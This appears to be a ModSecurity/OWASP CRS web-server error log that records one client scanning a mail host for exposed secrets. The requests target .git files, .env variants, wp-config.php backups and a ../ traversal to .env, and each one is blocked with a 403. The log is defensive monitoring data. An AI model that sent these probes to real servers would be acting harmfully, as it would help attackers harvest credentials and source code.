[Tue May 12 05:29:57.636636 2026] [security2:error] [pid 1808852:tid 1808855] [client 45.148.10.247:57348] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.git/index"] [unique_id "agKetRfeipD4uoG21FowvQAAAAA"]
[Tue May 12 05:29:57.636783 2026] [security2:error] [pid 1808852:tid 1808855] [client 45.148.10.247:57348] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.git/index"] [unique_id "agKetRfeipD4uoG21FowvQAAAAA"]
[Tue May 12 05:29:58.170710 2026] [security2:error] [pid 1842385:tid 1842399] [client 45.148.10.247:57286] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetRs7kySIUZ3ORnIl7gAAAQk"]
[Tue May 12 05:29:58.210793 2026] [security2:error] [pid 1842385:tid 1842399] [client 45.148.10.247:57286] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.git/logs/HEAD"] [unique_id "agKeths7kySIUZ3ORnIl8gAAAQk"]
[Tue May 12 05:29:58.211011 2026] [security2:error] [pid 1842385:tid 1842399] [client 45.148.10.247:57286] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.git/logs/HEAD"] [unique_id "agKeths7kySIUZ3ORnIl8gAAAQk"]
[Tue May 12 05:29:58.270479 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:57228] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKetggpmE1yW0glLdguJQAAAM4"]
[Tue May 12 05:29:58.270696 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:57228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKetggpmE1yW0glLdguJQAAAM4"]
[Tue May 12 05:29:58.328171 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:57272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetM1tk6y7yBJLpJo5mAAAAI4"]
[Tue May 12 05:29:58.385717 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:57272] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.git/config"] [unique_id "agKets1tk6y7yBJLpJo5oQAAAI4"]
[Tue May 12 05:29:58.385905 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:57272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.git/config"] [unique_id "agKets1tk6y7yBJLpJo5oQAAAI4"]
[Tue May 12 05:29:58.571508 2026] [security2:error] [pid 1844863:tid 1844884] [client 45.148.10.247:57252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetfaAnTZtx1_H_wy3ZwAAAU8"]
[Tue May 12 05:29:58.574929 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.247:57244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetNr1yOh9TvizezifkwAAAEM"]
[Tue May 12 05:29:58.612839 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.247:57244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.txt"] [unique_id "agKettr1yOh9TvizeziflwAAAEM"]
[Tue May 12 05:29:58.612839 2026] [security2:error] [pid 1844863:tid 1844884] [client 45.148.10.247:57252] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php.bak"] [unique_id "agKetvaAnTZtx1_H_wy3aQAAAU8"]
[Tue May 12 05:29:58.613052 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.247:57244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.txt"] [unique_id "agKettr1yOh9TvizeziflwAAAEM"]
[Tue May 12 05:29:58.613052 2026] [security2:error] [pid 1844863:tid 1844884] [client 45.148.10.247:57252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php.bak"] [unique_id "agKetvaAnTZtx1_H_wy3aQAAAU8"]
[Tue May 12 05:29:58.632279 2026] [security2:error] [pid 1844863:tid 1844880] [client 45.148.10.247:57280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetfaAnTZtx1_H_wy3ZQAAAUs"]
[Tue May 12 05:29:58.643855 2026] [security2:error] [pid 1808852:tid 1808871] [client 45.148.10.247:57294] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKethfeipD4uoG21FowvgAAABA"]
[Tue May 12 05:29:58.644065 2026] [security2:error] [pid 1808852:tid 1808871] [client 45.148.10.247:57294] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKethfeipD4uoG21FowvgAAABA"]
[Tue May 12 05:29:58.660877 2026] [security2:error] [pid 1844863:tid 1844880] [client 45.148.10.247:57280] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/api/.env"] [unique_id "agKetvaAnTZtx1_H_wy3agAAAUs"]
[Tue May 12 05:29:58.661090 2026] [security2:error] [pid 1844863:tid 1844880] [client 45.148.10.247:57280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/api/.env"] [unique_id "agKetvaAnTZtx1_H_wy3agAAAUs"]
[Tue May 12 05:29:58.697814 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.247:57418] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.ENV"] [unique_id "agKetvaAnTZtx1_H_wy3awAAAVI"]
[Tue May 12 05:29:58.698034 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.247:57418] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.ENV"] [unique_id "agKetvaAnTZtx1_H_wy3awAAAVI"]
[Tue May 12 05:29:58.754094 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:57310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetdr1yOh9TvizeziflQAAAEY"]
[Tue May 12 05:29:58.774175 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.247:57336] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetRs7kySIUZ3ORnIl8QAAAQA"]
[Tue May 12 05:29:58.803864 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:57310] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php.txt"] [unique_id "agKettr1yOh9TvizezifmAAAAEY"]
[Tue May 12 05:29:58.804069 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:57310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php.txt"] [unique_id "agKettr1yOh9TvizezifmAAAAEY"]
[Tue May 12 05:29:58.949186 2026] [security2:error] [pid 1825287:tid 1825312] [client 45.148.10.247:57334] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetQgpmE1yW0glLdguIQAAAMc"]
[Tue May 12 05:29:58.970874 2026] [security2:error] [pid 1825287:tid 1825312] [client 45.148.10.247:57334] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/local/.env"] [unique_id "agKetggpmE1yW0glLdguKAAAAMc"]
[Tue May 12 05:29:58.971083 2026] [security2:error] [pid 1825287:tid 1825312] [client 45.148.10.247:57334] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/local/.env"] [unique_id "agKetggpmE1yW0glLdguKAAAAMc"]
[Tue May 12 05:29:59.103273 2026] [security2:error] [pid 1808852:tid 1808866] [client 45.148.10.247:57312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetBfeipD4uoG21FowuwAAAAs"]
[Tue May 12 05:29:59.125883 2026] [security2:error] [pid 1808852:tid 1808866] [client 45.148.10.247:57312] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKetxfeipD4uoG21FowvwAAAAs"]
[Tue May 12 05:29:59.125979 2026] [security2:error] [pid 1808852:tid 1808866] [client 45.148.10.247:57312] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKetxfeipD4uoG21FowvwAAAAs"]
[Tue May 12 05:29:59.126149 2026] [security2:error] [pid 1808852:tid 1808866] [client 45.148.10.247:57312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKetxfeipD4uoG21FowvwAAAAs"]
[Tue May 12 05:29:59.262300 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:57240] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetQgpmE1yW0glLdguHwAAANE"]
[Tue May 12 05:29:59.263523 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.247:57380] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetc1tk6y7yBJLpJo5mwAAAIM"]
[Tue May 12 05:29:59.281439 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.247:57380] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.git/HEAD"] [unique_id "agKet81tk6y7yBJLpJo5pAAAAIM"]
[Tue May 12 05:29:59.281633 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.247:57380] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.git/HEAD"] [unique_id "agKet81tk6y7yBJLpJo5pAAAAIM"]
[Tue May 12 05:29:59.336797 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:57228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetggpmE1yW0glLdguJQAAAM4"]
